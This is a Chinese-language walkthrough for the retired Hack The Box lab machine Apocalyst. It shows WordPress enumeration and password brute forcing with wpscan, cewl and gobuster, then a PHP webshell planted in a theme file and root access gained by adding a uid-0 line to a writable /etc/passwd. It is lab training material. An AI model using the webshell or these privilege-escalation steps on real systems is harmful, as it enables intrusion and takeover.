• HTB-靶机-Apocalyst


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.46

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令

    autorecon 10.10.10.46 -o ./apocalyst-autorecon

    最终的扫描结果

    发现开放了两个端口,访问web应用看看

    然后根据上面扫描的结果中爆破的目录有很多,目标是个WordPress程序,访问到了其后台管理地址,这里刚开始是使用IP地址访问,发现目标地址会自动访问域名,所以就添加了本地hosts

    echo "10.10.10.46 apocalyst.htb" | sudo tee -a /etc/hosts.

    访问正常之后,先使用wpscan把目标存在的用户跑出来

    wpscan --url http://apocalyst.htb/ -e

    有了用户根据目标页面生成字典再跑一下

    cewl -d 0 http://apocalyst.htb -w brutelist.txt

    使用上面的字典跑一下WordPress的用户密码

    wpscan --url http://apocalyst.htb --usernames falaraki --passwords ./brutelist.txt

    遗憾的是没有跑出来密码,那么再回到开始再次跑目录,不过这次是使用上面得到的字典去跑

    gobuster dir -u http://apocalyst.htb/ -w /home/kali/Downloads/htb/apocalyst/brutelist.txt -x php -o bmfx-apocalyst.gobusters -t 100 -f -l
    上述跑出来显示长度和大小

    根据上面跑出来的目录,经过大量访问测试,最终锁定目录/Rightiousness下访问得到的图片中使用了隐写术存放了密码字典

    既然有类似字典的,那么再跑下WordPress的用户密码

    wpscan --url http://apocalyst.htb --usernames falaraki --passwords ./list.txt

    跑出了密码

    | Username: falaraki, Password: Transclisiation

    登录了到目标WordPress后台,发现跟之前的靶机blocky利用方式一样,具体如下

    登录到目标WordPress程序找到路径/wp-content/themes/twentyseventeen/page.php 当然还有其他写webshell代码的位置,只要有权限写入即可,这里只是列举其中之一,写入如下php代码

    if (isset($_GET[0])) {
    system($_GET[0]);
    }

    访问 http://apocalyst.htb/wp-content/themes/twentyseventeen/page.php?0=id 即可远程执行命令

    根据上面的操作原理,制作的如下一键反弹shell代码
    https://github.com/nullarmor/hackthebox-exploits/blob/master/blocky/exploit.py (使用Python3执行)

     

    也可以自己反弹shell

    使用LinEnum.sh收集了提权相关的信息,发现/etc/passwd是含有写入的权限,直接添加一个uid为0的用户即可提权

    bmfx:vElWaD/nKmUyw:0:0:root:/root:/bin/bash

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    dd是___元素
    【电商8】footer mod_service
    外边距塌陷问题
    隐藏display: ____;
    判断一个32位的整数的二进制有几个1
    8 switch case
    键盘录入
    两个整数的交换
    运算符
    java 异常报错总结
  • 原文地址:https://www.cnblogs.com/autopwn/p/14001323.html
Copyright © 2020-2023  润新知